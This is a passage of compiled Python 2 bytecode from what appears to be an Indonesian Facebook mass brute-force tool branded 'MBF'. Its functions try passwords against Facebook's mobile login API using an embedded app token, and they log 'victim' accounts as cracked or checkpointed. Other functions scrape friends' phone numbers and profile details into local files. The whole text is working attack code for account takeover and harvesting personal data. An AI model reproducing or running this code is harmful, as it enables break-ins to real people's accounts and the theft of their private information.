01\x0f\x01\x12\x01$\x01\r\x01\x0e\x01\n\x01\x05\x01\x05\x01\n\x01\x05\x01\n\x01\x0c\x01c\x00\x00\x00\x00\x06\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\x8a\x01\x00\x00d\x01\x00a\x00\x00g\x00\x00a\x01\x00g\x00\x00a\x02\x00g\x00\x00a\x03\x00t\x04\x00d\x02\x00d\x03\x00\x83\x02\x00}\x00\x00|\x00\x00j\x05\x00\x83\x00\x00j\x06\x00\x83\x00\x00a\x07\x00xJ\x01t\x08\x00r\x85\x01t\x08\x00j\t\x00\x83\x00\x00j\n\x00\x83\x00\x00}\x01\x00d\x04\x00|\x01\x00\x17d\x05\x00\x17t\x0b\x00\x17d\x06\x00\x17}\x02\x00t\x0c\x00j\r\x00|\x02\x00\x83\x01\x00}\x03\x00t\x0e\x00j\x0f\x00|\x03\x00\x83\x01\x00}\x04\x00t\x00\x00t\x10\x00t\x07\x00\x83\x01\x00k\x02\x00r\x9e\x00Pn\x00\x00d\x07\x00|\x04\x00k\x06\x00r\xf6\x00t\x04\x00d\x08\x00d\t\x00\x83\x02\x00}\x05\x00|\x05\x00j\x11\x00|\x01\x00d\n\x00\x17\x83\x01\x00\x01|\x05\x00j\x12\x00\x83\x00\x00\x01t\x01\x00j\x13\x00|\x01\x00d\x0b\x00\x17t\x0b\x00\x17\x83\x01\x00\x01t\x00\x00d\x0c\x007a\x00\x00n\x00\x00d\r\x00|\x04\x00k\x06\x00s\x0e\x01d\x0e\x00|\x04\x00k\x06\x00r0\x01t\x02\x00j\x13\x00|\x01\x00d\x0f\x00\x17t\x0b\x00\x17\x83\x01\x00\x01t\x00\x00d\x0c\x007a\x00\x00n\x17\x00t\x03\x00j\x13\x00|\x01\x00\x83\x01\x00\x01t\x00\x00d\x0c\x007a\x00\x00t\x14\x00j\x15\x00j\x11\x00d\x10\x00t\x16\x00t\x00\x00\x83\x01\x00\x17d\x11\x00\x17t\x16\x00t\x10\x00t\x07\x00\x83\x01\x00\x83\x01\x00\x17\x83\x01\x00\x01t\x14\x00j\x15\x00j\x17\x00\x83\x00\x00\x01q<\x00Wd\x00\x00S(\x12\x00\x00\x00Ni\x00\x00\x00\x00s\t\x00\x00\x00teman.txtR\x18\x00\x00\x00s\x91\x00\x00\x00https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=s\x17\x00\x00\x00&locale=en_US&password=sH\x00\x00\x00&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6R\x84\x00\x00\x00s\n\x00\x00\x00korban.txtR*\x00\x00\x00s\x01\x00\x00\x00\ns\x1c\x00\x00\x00 | \x1b[1;92mPassword \x1b[1;97m: i\x01\x00\x00\x00s\x10\x00\x00\x00www.facebook.coms\x05\x00\x00\x00(403)s\x1c\x00\x00\x00 | \x1b[1;93mPassword \x1b[1;97m: s%\x00\x00\x00\r\x1b[1;91m[%] \x1b[1;92mCrack \x1b[1;97m: s\x03\x00\x00\x00 > (\x18\x00\x00\x00t\x02\x00\x00\x00lit\x08\x00\x00\x00berhasilt\x08\x00\x00\x00cekpointt\x05\x00\x00\x00gagalR\x1b\x00\x00\x00R\x1c\x00\x00\x00Ri\x00\x00\x00R\x9b\x00\x00\x00t\x04\x00\x00\x00filet\x08\x00\x00\x00readlinet\x05\x00\x00\x00stript\n\x00\x00\x00korbanpassRy\x00\x00\x00Rw\x00\x00\x00R\x1f\x00\x00\x00R\xa4\x00\x00\x00R\x0c\x00\x00\x00RP\x00\x00\x00R\x86\x00\x00\x00R#\x00\x00\x00R\t\x00\x00\x00Rb\x00\x00\x00R\xa5\x00\x00\x00Rc\x00\x00\x00(\x06\x00\x00\x00R\xab\x00\x00\x00t\x08\x00\x00\x00korbanidRH\x00\x00\x00Rt\x00\x00\x00t\x04\x00\x00\x00hehet\x06\x00\x00\x00bukaya(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>t\x05\x00\x00\x00crack\xc9\x01\x00\x00s4\x00\x00\x00\x00\x02\x06\x01\x06\x01\x06\x01\x06\x01\x0f\x01\x12\x01\t\x01\x12\x01\x16\x01\x0f\x01\x0f\x01\x12\x02\x04\x01\x0c\x01\x0f\x01\x11\x01\n\x01\x15\x01\r\x02\x18\x01\x15\x01\r\x02\r\x01\n\x01.\x00c\x00\x00\x00\x00\x06\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\x8a\x01\x00\x00d\x01\x00a\x00\x00g\x00\x00a\x01\x00g\x00\x00a\x02\x00g\x00\x00a\x03\x00t\x04\x00d\x02\x00d\x03\x00\x83\x02\x00}\x00\x00|\x00\x00j\x05\x00\x83\x00\x00j\x06\x00\x83\x00\x00a\x07\x00xJ\x01t\x08\x00r\x85\x01t\x08\x00j\t\x00\x83\x00\x00j\n\x00\x83\x00\x00}\x01\x00d\x04\x00|\x01\x00\x17d\x05\x00\x17t\x0b\x00\x17d\x06\x00\x17}\x02\x00t\x0c\x00j\r\x00|\x02\x00\x83\x01\x00}\x03\x00t\x0e\x00j\x0f\x00|\x03\x00\x83\x01\x00}\x04\x00t\x00\x00t\x10\x00t\x07\x00\x83\x01\x00k\x02\x00r\x9e\x00Pn\x00\x00d\x07\x00|\x04\x00k\x06\x00r\xf6\x00t\x04\x00d\x08\x00d\t\x00\x83\x02\x00}\x05\x00|\x05\x00j\x11\x00|\x01\x00d\n\x00\x17\x83\x01\x00\x01|\x05\x00j\x12\x00\x83\x00\x00\x01t\x01\x00j\x13\x00|\x01\x00d\x0b\x00\x17t\x0b\x00\x17\x83\x01\x00\x01t\x00\x00d\x0c\x007a\x00\x00n\x00\x00d\r\x00|\x04\x00k\x06\x00s\x0e\x01d\x0e\x00|\x04\x00k\x06\x00r0\x01t\x02\x00j\x13\x00|\x01\x00d\x0f\x00\x17t\x0b\x00\x17\x83\x01\x00\x01t\x00\x00d\x0c\x007a\x00\x00n\x17\x00t\x03\x00j\x13\x00|\x01\x00\x83\x01\x00\x01t\x00\x00d\x0c\x007a\x00\x00t\x14\x00j\x15\x00j\x11\x00d\x10\x00t\x16\x00t\x00\x00\x83\x01\x00\x17d\x11\x00\x17t\x16\x00t\x10\x00t\x07\x00\x83\x01\x00\x83\x01\x00\x17\x83\x01\x00\x01t\x14\x00j\x15\x00j\x17\x00\x83\x00\x00\x01q<\x00Wd\x00\x00S(\x12\x00\x00\x00Ni\x00\x00\x00\x00s\x0b\x00\x00\x00IDgroup.txtR\x18\x00\x00\x00s\x91\x00\x00\x00https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=s\x17\x00\x00\x00&locale=en_US&password=sH\x00\x00\x00&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6R\x84\x00\x00\x00s\x0b\x00\x00\x00korbang.txtR*\x00\x00\x00s\x01\x00\x00\x00\ns\x1c\x00\x00\x00 | \x1b[1;92mPassword \x1b[1;97m: i\x01\x00\x00\x00s\x10\x00\x00\x00www.facebook.coms\x05\x00\x00\x00(403)s\x1c\x00\x00\x00 | \x1b[1;93mPassword \x1b[1;97m: s%\x00\x00\x00\r\x1b[1;91m[%] \x1b[1;92mCrack \x1b[1;97m: s\x03\x00\x00\x00 > (\x18\x00\x00\x00R\xad\x00\x00\x00R\xae\x00\x00\x00R\xaf\x00\x00\x00R\xb0\x00\x00\x00R\x1b\x00\x00\x00R\x1c\x00\x00\x00Ri\x00\x00\x00R\x9b\x00\x00\x00R\xb1\x00\x00\x00R\xb2\x00\x00\x00R\xb3\x00\x00\x00t\x0b\x00\x00\x00korbanpass1Ry\x00\x00\x00Rw\x00\x00\x00R\x1f\x00\x00\x00R\xa4\x00\x00\x00R\x0c\x00\x00\x00RP\x00\x00\x00R\x86\x00\x00\x00R#\x00\x00\x00R\t\x00\x00\x00Rb\x00\x00\x00R\xa5\x00\x00\x00Rc\x00\x00\x00(\x06\x00\x00\x00R\xab\x00\x00\x00t\t\x00\x00\x00korbanidgRH\x00\x00\x00Rt\x00\x00\x00R\xb6\x00\x00\x00R\xb7\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>t\x06\x00\x00\x00crackg\xe8\x01\x00\x00s4\x00\x00\x00\x00\x02\x06\x01\x06\x01\x06\x01\x06\x01\x0f\x01\x12\x01\t\x01\x12\x01\x16\x01\x0f\x01\x0f\x01\x12\x02\x04\x01\x0c\x01\x0f\x01\x11\x01\n\x01\x15\x01\r\x02\x18\x01\x15\x01\r\x02\r\x01\n\x01.\x00c\x00\x00\x00\x00\x02\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s{\x00\x00\x00y=\x00t\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00}\x00\x00d\x03\x00GHt\x02\x00d\x04\x00\x83\x01\x00\x01t\x03\x00\x83\x00\x00\x01t\x04\x00\x83\x00\x00\x01t\x05\x00\x83\x00\x00\x01Wn7\x00\x04t\x06\x00k\n\x00rv\x00\x01\x01\x01d\x05\x00d\x06\x00\x14GHd\x07\x00GHd\x08\x00GHt\x07\x00d\t\x00\x83\x01\x00}\x01\x00t\x08\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S(\n\x00\x00\x00Ns\t\x00\x00\x00login.txtR\x18\x00\x00\x00s%\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mTunggu sebentar ...i\x01\x00\x00\x00i\x14\x00\x00\x00s\x08\x00\x00\x00\x1b[1;97m=s\x17\x00\x00\x00\x1b[1;91m[X] \x1b[1;92mErrors\'\x00\x00\x00\x1b[1;91m[!] \x1b[1;92mPerlu Ambil Id dulu !s!\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m](\t\x00\x00\x00R\x1b\x00\x00\x00R\x1c\x00\x00\x00R7\x00\x00\x00Ra\x00\x00\x00t\t\x00\x00\x00menu_liket\r\x00\x00\x00menu_perasaanR(\x00\x00\x00R\x07\x00\x00\x00R,\x00\x00\x00(\x02\x00\x00\x00R)\x00\x00\x00R\xa6\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>R6\x00\x00\x00\x08\x02\x00\x00s\x1a\x00\x00\x00\x00\x01\x03\x01\x15\x01\x05\x01\n\x01\x07\x01\x07\x01\x0b\x01\r\x01\t\x01\x05\x01\x05\x01\x0c\x01c\x00\x00\x00\x00\x0c\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00sF\x02\x00\x00y(\x00t\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00}\x00\x00d\x03\x00GHt\x02\x00d\x04\x00\x83\x01\x00\x01Wn7\x00\x04t\x03\x00k\n\x00ra\x00\x01\x01\x01d\x05\x00d\x06\x00\x14GHd\x07\x00GHd\x08\x00GHt\x04\x00d\t\x00\x83\x01\x00}\x01\x00t\x05\x00\x83\x00\x00\x01n\x01\x00Xy\x11\x00t\x06\x00j\x07\x00d\n\x00\x83\x01\x00\x01Wn\x1e\x00\x04t\x08\x00k\n\x00r\x93\x00\x01\x01\x01t\x06\x00j\t\x00d\x0b\x00\x83\x01\x00\x01n\x01\x00Xd\x0c\x00GHd\r\x00d\x0e\x00\x14GHd\x0f\x00GHt\x02\x00d\x04\x00\x83\x01\x00\x01d\x10\x00GHd\r\x00d\x06\x00\x14GHy\xf5\x00t\n\x00j\x0b\x00d\x11\x00|\x00\x00\x17\x83\x01\x00}\x02\x00t\x0c\x00j\r\x00|\x02\x00j\x0e\x00\x83\x01\x00}\x03\x00t\x00\x00d\x12\x00d\x13\x00\x83\x02\x00}\x04\x00x\x93\x00|\x03\x00d\x14\x00\x19D]\x87\x00}\x05\x00t\n\x00j\x0b\x00d\x15\x00|\x05\x00d\x16\x00\x19\x17d\x17\x00\x17|\x00\x00\x17\x83\x01\x00}\x06\x00t\x0c\x00j\r\x00|\x06\x00j\x0e\x00\x83\x01\x00}\x07\x00y<\x00|\x04\x00j\x0f\x00|\x07\x00d\x18\x00\x19d\x19\x00\x17\x83\x01\x00\x01d\x1a\x00|\x07\x00d\x1b\x00\x19\x17GHd\x1c\x00|\x07\x00d\x18\x00\x19\x17GHd\r\x00d\x06\x00\x14GHWq\x01\x01\x04t\x10\x00k\n\x00r\x87\x01\x01\x01\x01q\x01\x01Xq\x01\x01W|\x04\x00j\x11\x00\x83\x00\x00\x01d\x1d\x00GHd\x1e\x00GHt\x04\x00d\t\x00\x83\x01\x00}\x08\x00t\x05\x00\x83\x00\x00\x01Wn\x8b\x00\x04t\x12\x00k\n\x00r\xdf\x01\x01\x01\x01d\x1f\x00GHt\x04\x00d\t\x00\x83\x01\x00}\t\x00t\x05\x00\x83\x00\x00\x01nc\x00\x04t\x10\x00k\n\x00r\x07\x02\x01\x01\x01d \x00GHt\x04\x00d\t\x00\x83\x01\x00}\n\x00t\x05\x00\x83\x00\x00\x01n;\x00\x04t\n\x00j\x13\x00j\x14\x00t\n\x00j\x13\x00j\x15\x00f\x02\x00k\n\x00rA\x02\x01\x01\x01d!\x00GHt\x04\x00d\t\x00\x83\x01\x00}\x0b\x00t\x05\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S("\x00\x00\x00Ns\t\x00\x00\x00login.txtR\x18\x00\x00\x00s%\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mTunggu sebentar ...i\x01\x00\x00\x00i\x14\x00\x00\x00s\x08\x00\x00\x00\x1b[1;97m=s\x17\x00\x00\x00\x1b[1;91m[X] \x1b[1;92mErrors\'\x00\x00\x00\x1b[1;91m[!] \x1b[1;92mPerlu Ambil Id dulu !s!\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]t\x06\x00\x00\x00sampahR\x02\x00\x00\x00s\xaf\x03\x00\x00\n\x1b[1;31m __.-/|\n \\`\x1b[1;97mo\x1b[1;31m_\x1b[1;97mO\x1b[1;31m\'\n \x1b[1;93m=\x1b[1;31m( )\x1b[1;93m= \x1b[1;34m+------+\n \x1b[1;35mU\x1b[1;31m| \x1b[1;34m | \x1b[1;37mMBF\x1b[1;91mz \x1b[1;34m|\n\x1b[1;31m /\\ /\\ / | \x1b[1;34m+------+\n\x1b[1;31m ) /^\\) ^\\/ \x1b[1;37m_)\x1b[1;31m\\ \x1b[1;34m |\n\x1b[1;31m ) /^\\/ \x1b[1;37m _)\x1b[1;31m \\ \x1b[1;34m |\n\x1b[1;31m ) _ / / \x1b[1;37m_) \x1b[1;31m \\___\x1b[1;34m|\x1b[1;31m_\n\x1b[1;33m /\\ \x1b[1;31m)/\\/ || | \x1b[1;37m)_)\x1b[1;31m\\___\x1b[1;37m,\x1b[1;34m|\x1b[1;37m))\n\x1b[1;33m< > \x1b[1;31m |\x1b[1;37m(,,) )__) \x1b[1;34m |\n\x1b[1;31m || / \\\x1b[1;37m)___)\x1b[1;31m\\\n\x1b[1;31m | \\____( )___) )____\n\x1b[1;31m \\______(_______\x1b[1;37m;;;\x1b[1;31m)__\x1b[1;37m;;;\x1b[1;31m) \x1b[1;93mCopyright, @\x1b[4mpirmansx\x1b[0m\n\x1b[1;91m.:[ \x1b[1;92mCompiler\x1b[1;97m : \x1b[1;96mZeDD\n\x1b[1;91m | \x1b[1;92mYoutube\x1b[1;97m : UCuZ3LerXYmrvSKmtuJWutsA\n\x1b[1;91m | \x1b[1;92mInstaG\x1b[1;97m : @aabdulbasitkambo\n\x1b[1;91m | \x1b[1;92mGitHub\x1b[1;97m : \x1b[4mhttps://github.com/CLB-09\x1b[0mi2\x00\x00\x00s\x08\x00\x00\x00\x1b[1;97m_s0\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mMengambil semua nomor teman...s\x1a\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mMulai...s3\x00\x00\x00https://graph.facebook.com/me/friends?access_token=s\x10\x00\x00\x00sampah/nomor.txtRM\x00\x00\x00Rt\x00\x00\x00s\x1b\x00\x00\x00https://graph.facebook.com/R\x1a\x00\x00\x00s\x0e\x00\x00\x00?access_token=t\x0c\x00\x00\x00mobile_phones\x01\x00\x00\x00\ns\x1e\x00\x00\x00\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m R\x19\x00\x00\x00s\x1d\x00\x00\x00\x1b[1;92mNomor\x1b[1;91m : \x1b[1;97ms\x19\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mSelesais5\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mTersimpan \x1b[1;97m: sampah/nomor.txts\x13\x00\x00\x00\x1b[1;91m[!] Terhentis \x00\x00\x00\x1b[1;91m[X] Gagal mengambil Emails\x18\x00\x00\x00\x1b[1;91m[!] Koneksi Error(\x16\x00\x00\x00R\x1b\x00\x00\x00R\x1c\x00\x00\x00R7\x00\x00\x00R(\x00\x00\x00R\x07\x00\x00\x00R,\x00\x00\x00R\x08\x00\x00\x00t\x05\x00\x00\x00mkdirt\x07\x00\x00\x00OSErrorR\x15\x00\x00\x00R\x1d\x00\x00\x00R\x1e\x00\x00\x00R\x1f\x00\x00\x00R \x00\x00\x00R!\x00\x00\x00RP\x00\x00\x00R\'\x00\x00\x00R\x86\x00\x00\x00R{\x00\x00\x00R\x87\x00\x00\x00R\x88\x00\x00\x00t\x14\x00\x00\x00ChunkedEncodingError(\x0c\x00\x00\x00R)\x00\x00\x00R\xa6\x00\x00\x00R\x18\x00\x00\x00R*\x00\x00\x00t\x03\x00\x00\x00outRd\x00\x00\x00R\r\x00\x00\x00t\x01\x00\x00\x00zt\x0e\x00\x00\x00inputanyanomort\x0f\x00\x00\x00inputanyanomor1t\x0f\x00\x00\x00inputanyanomor2t\x0f\x00\x00\x00inputanyanomor3(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>R1\x00\x00\x00\x17\x02\x00\x00sf\x00\x00\x00\x00\x01\x03\x01\x15\x01\x05\x01\x0e\x01\r\x01\t\x01\x05\x01\x05\x01\x0c\x01\x0b\x02\x03\x01\x11\x01\r\x03\x11\x12\x05\x01\t\x01\x05\x01\n\x01\x05\x01\t\x02\x03\x01\x13\x01\x12\x02\x0f\x02\x11\x01\x1f\x01\x12\x02\x03\x01\x15\x01\r\x01\r\x01\r\x01\r\x01\x08\x01\n\x01\x05\x01\x05\x01\x0c\x01\x0b\x02\r\x01\x05\x01\x0c\x01\n\x01\r\x01\x05\x01\x0c\x01\n\x01\x1f\x01\x05\x01\x0c\x01c\x00\x00\x00\x00\x07\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s]\x01\x00\x00y(\x00t\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00}\x00\x00d\x03\x00GHt\x02\x00d\x04\x00\x83\x01\x00\x01Wn7\x00\x04t\x03\x00k\n\x00ra\x00\x01\x01\x01d\x05\x00d\x06\x00\x14GHd\x07\x00GHd\x08\x00GHt\x04\x00d\t\x00\x83\x01\x00}\x01\x00t\x05\x00\x83\x00\x00\x01n\x01\x00Xy)\x00t\x06\x00j\x07\x00d\n\x00|\x00\x00\x17\x83\x01\x00}\x02\x00t\x08\x00j\t\x00|\x02\x00j\n\x00\x83\x01\x00a\x0b\x00Wnt\x00\x04t\x0c\x00k\n\x00r\xc4\x00\x01\x01\x01d\x05\x00d\x06\x00\x14GHd\x07\x00GHd\x08\x00GHt\x04\x00d\t\x00\x83\x01\x00}\x03\x00t\x05\x00\x83\x00\x00\x01n>\x00\x04t\x06\x00j\r\x00j\x0e\x00k\n\x00r\x01\x01\x01\x01\x01d\x0b\x00GHd\x0c\x00GHt\x02\x00d\r\x00\x83\x01\x00\x01t\x04\x00d\t\x00\x83\x01\x00}\x04\x00t\x05\x00\x83\x00\x00\x01n\x01\x00Xx#\x00t\x0b\x00d\x0e\x00\x19D]\x17\x00}\x05\x00t\x0f\x00j\x10\x00|\x05\x00d\x0f\x00\x19\x83\x01\x00\x01q\r\x01Wd\x10\x00t\x11\x00t\x0f\x00\x83\x01\x00\x16Gt\x12\x00j\x13\x00j\x14\x00\x83\x00\x00\x01t\x02\x00d\x11\x00\x83\x01\x00\x01t\x04\x00d\x12\x00\x83\x01\x00}\x06\x00d\x00\x00S(\x13\x00\x00\x00Ns\t\x00\x00\x00login.txtR\x18\x00\x00\x00s%\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mTunggu sebentar ...i\x01\x00\x00\x00i\x14\x00\x00\x00s\x08\x00\x00\x00\x1b[1;97m=s\x17\x00\x00\x00\x1b[1;91m[X] \x1b[1;92mErrors\'\x00\x00\x00\x1b[1;91m[!] \x1b[1;92mPerlu Ambil Id dulu !s!\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]s3\x00\x00\x00https://graph.facebook.com/me/friends?access_token=s\x18\x00\x00\x00\x1b[1;91m[!] Koneksi Errors\x14\x00\x00\x00\x1b[1;91m[!] Terhenti.i\x03\x00\x00\x00Rt\x00\x00\x00R\x1a\x00\x00\x00s+\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mJumlah teman\x1b[1;97m : %sg-C\x1c\xeb\xe26\x1a?s\x1b\x00\x00\x00\n\x1b[1;91m[+] \x1b[1;92mEnter...(\x15\x00\x00\x00R\x1b\x00\x00\x00R\x1c\x00\x00\x00R7\x00\x00\x00R(\x00\x00\x00R\x07\x00\x00\x00R,\x00\x00\x00R\x1d\x00\x00\x00R\x1e\x00\x00\x00R\x1f\x00\x00\x00R \x00\x00\x00R!\x00\x00\x00R*\x00\x00\x00R\'\x00\x00\x00R\x87\x00\x00\x00R\x88\x00\x00\x00t\x06\x00\x00\x00jumlahR#\x00\x00\x00R\x0c\x00\x00\x00R\t\x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00(\x07\x00\x00\x00R)\x00\x00\x00R\xa6\x00\x00\x00R\x18\x00\x00\x00t\x0c\x00\x00\x00inputerroor1t\r\x00\x00\x00inputanyamor1Rd\x00\x00\x00t\t\x00\x00\x00inputnext(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>R2\x00\x00\x00g\x02\x00\x00s>\x00\x00\x00\x00\x02\x03\x01\x15\x01\x05\x01\x0e\x01\r\x01\t\x01\x05\x01\x05\x01\x0c\x01\x0b\x01\x03\x01\x13\x01\x16\x02\r\x01\t\x01\x05\x01\x05\x01\x0c\x01\n\x02\x13\x01\x05\x01\x05\x01\n\x01\x0c\x01\x0b\x02\x11\x01\x15\x03\x0e\x00\r\x00\n\x01c\x00\x00\x00\x00\x07\x00\x00\x00\x07\x00\x00\x00C\x00\x00\x00sS\x03\x00\x00y(\x00t\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00}\x00\x00d\x03\x00GHt\x02\x00d\x04\x00\x83\x01\x00\x01Wn7\x00\x04t\x03\x00k\n\x00ra\x00\x01\x01\x01d\x05\x00d\x06\x00\x14GHd\x07\x00GHd\x08\x00GHt\x04\x00d\t\x00\x83\x01\x00}\x01\x00t\x05\x00\x83\x00\x00\x01n\x01\x00Xt\x06\x00j\x07\x00d\n\x00\x83\x01\x00\x01d\x0b\x00GHd\x0c\x00d\r\x00\x14GHt\x08\x00d\x0e\x00\x83\x01\x00}\x02\x00|\x02\x00d\x0f\x00k\x02\x00r\xa4\x00d\x10\x00GHt\t\x00\x83\x00\x00\x01n\x05\x00d\x11\x00GHx\xa3\x02t\n\x00d\x12\x00\x19D]\x7f\x02}\x03\x00|\x02\x00|\x03\x00d\x13\x00\x19k\x06\x00s\xda\x00|\x02\x00|\x03\x00d\x14\x00\x19k\x06\x00r\xb4\x00t\x0b\x00j\x0c\x00d\x15\x00|\x03\x00d\x14\x00\x19\x17d\x16\x00\x17|\x00\x00\x17\x83\x01\x00}\x04\x00t\r\x00j\x0e\x00|\x04\x00j\x0f\x00\x83\x01\x00}\x05\x00d\x17\x00GHd\x18\x00|\x05\x00d\x13\x00\x19\x17d\x19\x00\x17GHy\x11\x00d\x1a\x00|\x03\x00d\x14\x00\x19\x17GHWn\x11\x00\x04t\x10\x00k\n\x00rE\x01\x01\x01\x01n\x01\x00Xy\x11\x00d\x1b\x00|\x05\x00d\x1c\x00\x19\x17GHWn\x11\x00\x04t\x10\x00k\n\x00rj\x01\x01\x01\x01n\x01\x00Xy\x11\x00d\x1d\x00|\x05\x00d\x13\x00\x19\x17GHWn\x11\x00\x04t\x10\x00k\n\x00r\x8f\x01\x01\x01\x01n\x01\x00Xy\x11\x00d\x1e\x00|\x05\x00d\x1f\x00\x19\x17GHWn\x11\x00\x04t\x10\x00k\n\x00r\xb4\x01\x01\x01\x01n\x01\x00Xy\x11\x00d \x00|\x05\x00d!\x00\x19\x17GHWn\x11\x00\x04t\x10\x00k\n\x00r\xd9\x01\x01\x01\x01n\x01\x00Xy\x11\x00d"\x00|\x05\x00d#\x00\x19\x17GHWn\x11\x00\x04t\x10\x00k\n\x00r\xfe\x01\x01\x01\x01n\x01\x00Xy\x1d\x00d$\x00|\x05\x00d%\x00\x19j\x11\x00d&\x00d\'\x00\x83\x02\x00\x17GHWn\x11\x00\x04t\x10\x00k\n\x00r/\x02\x01\x01\x01n\x01\x00Xy\x11\x00d(\x00|\x05\x00d)\x00\x19\x17GHWn\x11\x00\x04t\x10\x00k\n\x00rT\x02\x01\x01\x01n\x01\x00Xy\x11\x00d*\x00|\x05\x00d+\x00\x19\x17GHWn\x11\x00\x04t\x10\x00k\n\x00ry\x02\x01\x01\x01n\x01\x00Xy\x1e\x00d,\x00|\x05\x00d-\x00\x19j\x12\x00d.\x00\x83\x01\x00d/\x00\x19\x17GHWn\x11\x00\x04t\x10\x00k\n\x00r\xab\x02\x01\x01\x01n\x01\x00Xy\x15\x00d0\x00|\x05\x00d1\x00\x19d\x13\x00\x19\x17GHWn\x11\x00\x04t\x10\x00k\n\x00r\xd4\x02\x01\x01\x01n\x01\x00XyG\x00d2\x00GHx;\x00|\x05\x00d3\x00\x19D]/\x00}\x03\x00y\x15\x00d4\x00|\x03\x00d5\x00\x19d\x13\x00\x19\x17GHWq\xe8\x02\x04t\x10\x00k\n\x00r\x16\x03\x01\x01\x01q\xe8\x02Xq\xe8\x02WWq3\x03\x04t\x10\x00k\n\x00r/\x03\x01\x01\x01q3\x03Xq\xb4\x00q\xb4\x00Wd6\x00GHt\x04\x00d\t\x00\x83\x01\x00}\x06\x00t\x05\x00\x83\x00\x00\x01d\x00\x00S(7\x00\x00\x00Ns\t\x00\x00\x00login.txtR\x18\x00\x00\x00s%\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mTunggu sebentar ...i\x01\x00\x00\x00i\x14\x00\x00\x00s\x08\x00\x00\x00\x1b[1;97m=s\x17\x00\x00\x00\x1b[1;91m[X] \x1b[1;92mErrors\'\x00\x00\x00\x1b[1;91m[!] \x1b[1;92mPerlu Ambil Id dulu !s!\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]R\x02\x00\x00\x00s\xaf\x03\x00\x00\n\x1b[1;31m __.-/|\n \\`\x1b[1;97mo\x1b[1;31m_\x1b[1;97mO\x1b[1;31m\'\n \x1b[1;93m=\x1b[1;31m( )\x1b[1;93m= \x1b[1;34m+------+\n \x1b[1;35mU\x1b[1;31m| \x1b[1;34m | \x1b[1;37mMBF\x1b[1;91mz \x1b[1;34m|\n\x1b[1;31m /\\ /\\ / | \x1b[1;34m+------+\n\x1b[1;31m ) /^\\) ^\\/ \x1b[1;37m_)\x1b[1;31m\\ \x1b[1;34m |\n\x1b[1;31m ) /^\\/ \x1b[1;37m _)\x1b[1;31m \\ \x1b[1;34m |\n\x1b[1;31m ) _ / / \x1b[1;37m_) \x1b[1;31m \\___\x1b[1;34m|\x1b[1;31m_\n\x1b[1;33m /\\ \x1b[1;31m)/\\/ || | \x1b[1;37m)_)\x1b[1;31m\\___\x1b[1;37m,\x1b[1;34m|\x1b[1;37m))\n\x1b[1;33m< > \x1b[1;31m |\x1b[1;37m(,,) )__) \x1b[1;34m |\n\x1b[1;31m || / \\\x1b[1;37m)___)\x1b[1;31m\\\n\x1b[1;31m | \\____( )___) )____\n\x1b[1;31m \\______(_______\x1b[1;37m;;;\x1b[1;31m)__\x1b[1;37m;;;\x1b[1;31m) \x1b[1;93mCopyright, @\x1b[4mpirmansx\x1b[0m\n\x1b[1;91m.:[ \x1b[1;92mCompiler\x1b[1;97m : \x1b[1;96mZeDD\n\x1b[1;91m | \x1b[1;92mYoutube\x1b[1;97m : UCuZ3LerXYmrvSKmtuJWutsA\n\x1b[1;91m | \x1b[1;92mInstaG\x1b[1;97m : @abdulbasitkambo\n\x1b[1;91m | \x1b[1;92mGitHub\x1b[1;97m : \x1b[4mhttps://github.com/CLB-09\x1b[0mi2\x00\x00\x00s\x08\x00\x00\x00\x1b[1;97m_s2\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mMasukkan Nama/ID teman\x1b[1;97m : R\\\x00\x00\x00s\x13\x00\x00\x00\x1b[1;91m[!] Masukkans\x1c\x00\x00\x00\x1b[1;91m[+]\x1b[1;92m Mencari...Rt\x00\x00\x00R\x19\x00\x00\x00R\x1a\x00\x00\x00s\x1b\x00\x00\x00https://graph.facebook.com/s\x0e\x00\x00\x00?access_token=Rf\x00\x00\x00s,\x00\x00\x00\x1b[1;91m[!] \x1b[1;97m---------- \x1b[1;91m[\x1b[1;96ms%\x00\x00\x00\x1b[1;91m] \x1b[1;97m---------- \x1b[1;91m[!]s\'\x00\x00\x00\n\x1b[1;91m[?] 